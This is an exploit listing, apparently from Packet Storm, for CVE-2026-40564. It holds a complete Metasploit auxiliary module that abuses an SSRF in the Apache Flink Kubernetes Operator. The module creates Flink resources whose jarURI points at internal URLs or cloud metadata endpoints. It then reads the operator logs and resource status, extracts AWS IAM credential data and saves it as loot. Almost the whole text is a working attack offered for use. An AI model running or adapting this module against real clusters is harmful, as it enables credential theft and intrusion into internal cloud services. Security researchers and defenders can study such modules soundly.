Share
## https://sploitus.com/exploit?id=PACKETSTORM:223516
==================================================================================================================================
| # Title : Apache Flink Kubernetes Operator 1.14.0 SSRF Exploit Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://flink.apache.org/ |
==================================================================================================================================
[+] Summary : This is a Metasploit auxiliary module for CVE-2026-40564, a Server-Side Request Forgery (SSRF) vulnerability in the Apache Flink Kubernetes Operator
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Apache Flink Kubernetes Operator SSRF (CVE-2026-40564)',
'Description' => %q{
A Server-Side Request Forgery (SSRF) vulnerability exists in the Apache
Flink Kubernetes Operator versions 1.14.0 through 1.15-SNAPSHOT (as of
2026-04-09). The operator does not validate the `spec.job.jarURI` field
on FlinkSessionJob or FlinkDeployment resources. Anyone who can create
these resources can set the jarURI to any URL, including internal services,
cloud metadata endpoints, or filesystem paths.
When the operator reconciles the resource, it fetches the URL from inside
its own pod, enabling attackers to:
- Read cloud instance metadata (AWS/GCE/Azure IAM credentials)
- Access internal cluster services
- Read local files via file:// scheme
- Scan internal ports
This module provides detection and exploitation capabilities for this
SSRF vulnerability.
},
'Author' => ['indoushka'],
'References' => [
['CVE', '2026-40564'],
['URL', 'https://lists.apache.org/thread/o1b3c08boc8fc9zw9qff5wsd3oc0l6sw'],
['URL', 'https://flink.apache.org/2026/05/28/flink-kubernetes-operator-ssrf-cve-2026-40564/']
],
'DisclosureDate' => '2026-05-28',
'License' => MSF_LICENSE,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Base Kubernetes API path', '/']),
OptString.new('NAMESPACE', [false, 'Kubernetes namespace', 'default']),
OptString.new('OPERATOR_POD', [false, 'Operator pod name (auto-detected if not set)']),
OptString.new('SSRF_URL', [true, 'Target URL for SSRF (e.g., http://169.254.169.254/latest/meta-data/)']),
OptString.new('RESOURCE_NAME', [false, 'FlinkSessionJob resource name', 'ssrf-exploit']),
OptString.new('BEARER_TOKEN', [false, 'Kubernetes API bearer token']),
OptBool.new('USE_SESSION_CLUSTER', [true, 'Use FlinkSessionJob instead of FlinkDeployment', true]),
OptInt.new('TIMEOUT', [false, 'HTTP request timeout', 30])
])
end
def k8s_api_url
"https://#{datastore['RHOST']}:#{datastore['RPORT']}"
end
def k8s_headers
headers = { 'Content-Type' => 'application/json' }
if datastore['BEARER_TOKEN'] && !datastore['BEARER_TOKEN'].empty?
headers['Authorization'] = "Bearer #{datastore['BEARER_TOKEN']}"
end
headers
end
def get_operator_pod
namespace = datastore['NAMESPACE']
url = "#{k8s_api_url}/api/v1/namespaces/#{namespace}/pods"
res = send_request_cgi(
'method' => 'GET',
'uri' => url,
'headers' => k8s_headers,
'ssl' => true
)
if res && res.code == 200
begin
pods = JSON.parse(res.body)
pods['items'].each do |pod|
if pod['metadata']['name'] =~ /flink-kubernetes-operator/
operator_pod = pod['metadata']['name']
print_good("Found operator pod: #{operator_pod}")
return operator_pod
end
end
rescue JSON::ParserError
print_error("Failed to parse pods response")
end
end
nil
end
def create_flink_session_job(resource_name, namespace, jar_uri)
print_status("Creating FlinkSessionJob resource: #{resource_name}")
session_job = {
apiVersion: "flink.apache.org/v1beta1",
kind: "FlinkSessionJob",
metadata: {
name: resource_name,
namespace: namespace
},
spec: {
job: {
jarURI: jar_uri,
parallelism: 1,
upgradeMode: "stateless"
},
flinkConfiguration: {},
jobManager: {},
taskManager: {}
}
}
url = "#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/flinksessionjobs"
res = send_request_cgi(
'method' => 'POST',
'uri' => url,
'headers' => k8s_headers,
'data' => session_job.to_json,
'ssl' => true
)
if res && res.code == 201
print_good("FlinkSessionJob created successfully")
return true
else
print_error("Failed to create FlinkSessionJob: HTTP #{res&.code}")
return false
end
end
def create_flink_deployment(resource_name, namespace, jar_uri)
print_status("Creating FlinkDeployment resource: #{resource_name}")
deployment = {
apiVersion: "flink.apache.org/v1beta1",
kind: "FlinkDeployment",
metadata: {
name: resource_name,
namespace: namespace
},
spec: {
flinkVersion: "v1_17",
flinkConfiguration: {},
jobManager: {},
taskManager: {},
job: {
jarURI: jar_uri,
parallelism: 1,
upgradeMode: "stateless"
}
}
}
url = "#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/flinkdeployments"
res = send_request_cgi(
'method' => 'POST',
'uri' => url,
'headers' => k8s_headers,
'data' => deployment.to_json,
'ssl' => true
)
if res && res.code == 201
print_good("FlinkDeployment created successfully")
return true
else
print_error("Failed to create FlinkDeployment: HTTP #{res&.code}")
return false
end
end
def get_resource_status(resource_name, namespace)
resource_type = datastore['USE_SESSION_CLUSTER'] ? 'flinksessionjobs' : 'flinkdeployments'
url = "#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/#{resource_type}/#{resource_name}"
res = send_request_cgi(
'method' => 'GET',
'uri' => url,
'headers' => k8s_headers,
'ssl' => true
)
if res && res.code == 200
begin
return JSON.parse(res.body)
rescue JSON::ParserError
return nil
end
end
nil
end
def get_operator_logs(pod_name, namespace)
url = "#{k8s_api_url}/api/v1/namespaces/#{namespace}/pods/#{pod_name}/log"
res = send_request_cgi(
'method' => 'GET',
'uri' => url,
'headers' => k8s_headers,
'ssl' => true
)
if res && res.code == 200
return res.body
end
nil
end
def check_ssrf_in_logs(logs, target_url)
if logs && logs.include?('HttpArtifactFetcher.fetch') && logs.include?(target_url)
print_good("SSRF confirmed in operator logs")
return true
end
false
end
def delete_resource(resource_name, namespace)
resource_type = datastore['USE_SESSION_CLUSTER'] ? 'flinksessionjobs' : 'flinkdeployments'
url = "#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/#{resource_type}/#{resource_name}"
res = send_request_cgi(
'method' => 'DELETE',
'uri' => url,
'headers' => k8s_headers,
'ssl' => true
)
if res && [200, 202, 204].include?(res.code)
print_good("Resource deleted successfully")
return true
else
print_warning("Failed to delete resource: HTTP #{res&.code}")
return false
end
end
def extract_metadata_response(response_body)
if response_body && !response_body.empty?
print_good("SSRF response received:")
print_line(response_body[0..1000])
if response_body.include?('iam') || response_body.include?('security-credentials')
print_good("Potential IAM credentials detected!")
role_match = response_body.match(/([a-zA-Z0-9\-_]+)/)
if role_match
print_status("IAM Role detected: #{role_match[1]}")
end
end
return true
end
false
end
def cleanup(resource_name, namespace)
print_status("Cleaning up resources...")
delete_resource(resource_name, namespace)
end
def check_permissions(namespace)
url = "#{k8s_api_url}/apis/flink.apache.org/v1beta1/namespaces/#{namespace}/flinksessionjobs"
res = send_request_cgi(
'method' => 'POST',
'uri' => url,
'headers' => k8s_headers,
'data' => {}.to_json, # Empty body to test permissions
'ssl' => true
)
if res && (res.code == 201 || res.code == 403)
if res.code == 403
print_error("Insufficient permissions to create Flink resources")
return false
else
print_good("Sufficient permissions to create Flink resources")
return true
end
end
print_warning("Could not determine permissions")
true
end
def run_host(ip)
print_status("CVE-2026-40564 - Apache Flink Kubernetes Operator SSRF")
print_status("Target: #{peer}")
print_status("SSRF Target URL: #{datastore['SSRF_URL']}")
namespace = datastore['NAMESPACE']
resource_name = "#{datastore['RESOURCE_NAME']}-#{Rex::Text.rand_text_alpha_lower(6)}"
print_status("Checking Kubernetes API connectivity...")
version_url = "#{k8s_api_url}/version"
res = send_request_cgi(
'method' => 'GET',
'uri' => version_url,
'headers' => k8s_headers,
'ssl' => true
)
unless res && res.code == 200
print_error("Cannot connect to Kubernetes API. Check RHOST, RPORT, and credentials.")
return
end
print_good("Connected to Kubernetes API")
unless check_permissions(namespace)
print_error("Insufficient permissions to exploit SSRF")
return
end
print_status("Creating malicious Flink resource...")
if datastore['USE_SESSION_CLUSTER']
success = create_flink_session_job(resource_name, namespace, datastore['SSRF_URL'])
else
success = create_flink_deployment(resource_name, namespace, datastore['SSRF_URL'])
end
unless success
print_error("Failed to create malicious resource")
return
end
print_status("Waiting for operator reconciliation (15 seconds)...")
Rex.sleep(15)
status = get_resource_status(resource_name, namespace)
if status && status['status']
print_status("Resource status: #{status['status'].to_json[0..200]}")
if status['status'].to_s.include?('Failed to fetch') ||
status['status'].to_s.include?('Connection refused') ||
status['status'].to_s.include?('connect timed out')
print_good("SSRF attempt confirmed - operator tried to fetch the URL")
end
end
operator_pod = datastore['OPERATOR_POD']
if operator_pod.nil? || operator_pod.empty?
operator_pod = get_operator_pod
end
if operator_pod
print_status("Fetching operator logs...")
logs = get_operator_logs(operator_pod, namespace)
if logs && logs.include?(datastore['SSRF_URL'])
print_good("SSRF CONFIRMED - operator fetched the URL!")
if logs =~ /GET.*?#{Regexp.escape(datastore['SSRF_URL'])}/
print_good("HTTP GET request to #{datastore['SSRF_URL']} found in logs")
end
if logs =~ /HttpArtifactFetcher\.fetch/
print_good("HttpArtifactFetcher call confirmed")
end
end
end
if datastore['SSRF_URL'].include?('169.254.169.254') || datastore['SSRF_URL'].include?('metadata')
print_status("Attempting to read AWS metadata response...")
metadata_url = datastore['SSRF_URL']
if !metadata_url.end_with?('/')
metadata_url = metadata_url + '/'
end
if datastore['USE_SESSION_CLUSTER']
create_flink_session_job("#{resource_name}-metadata", namespace, metadata_url)
else
create_flink_deployment("#{resource_name}-metadata", namespace, metadata_url)
end
Rex.sleep(10)
metadata_status = get_resource_status("#{resource_name}-metadata", namespace)
if metadata_status && metadata_status['status']
status_text = metadata_status['status'].to_s
if status_text.include?('iam') || status_text.include?('security-credentials')
print_good("Extracted metadata:")
print_line(status_text[0..500])
store_loot(
'flink.ssrf.metadata',
'text/plain',
ip,
status_text,
'aws_metadata.txt',
'AWS metadata captured via SSRF'
)
end
end
if datastore['USE_SESSION_CLUSTER']
delete_resource("#{resource_name}-metadata", namespace)
else
delete_resource("#{resource_name}-metadata", namespace)
end
end
report_vuln(
host: ip,
port: datastore['RPORT'],
name: name,
refs: references,
info: "Apache Flink Kubernetes Operator SSRF (CVE-2026-40564) - Able to fetch #{datastore['SSRF_URL']}"
)
if datastore['Cleanup']
cleanup(resource_name, namespace)
else
print_status("Resource #{resource_name} left for manual inspection")
print_status("Clean up with: kubectl delete -n #{namespace} #{datastore['USE_SESSION_CLUSTER'] ? 'flinksessionjob' : 'flinkdeployment'} #{resource_name}")
end
print_good("SSRF exploitation completed")
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================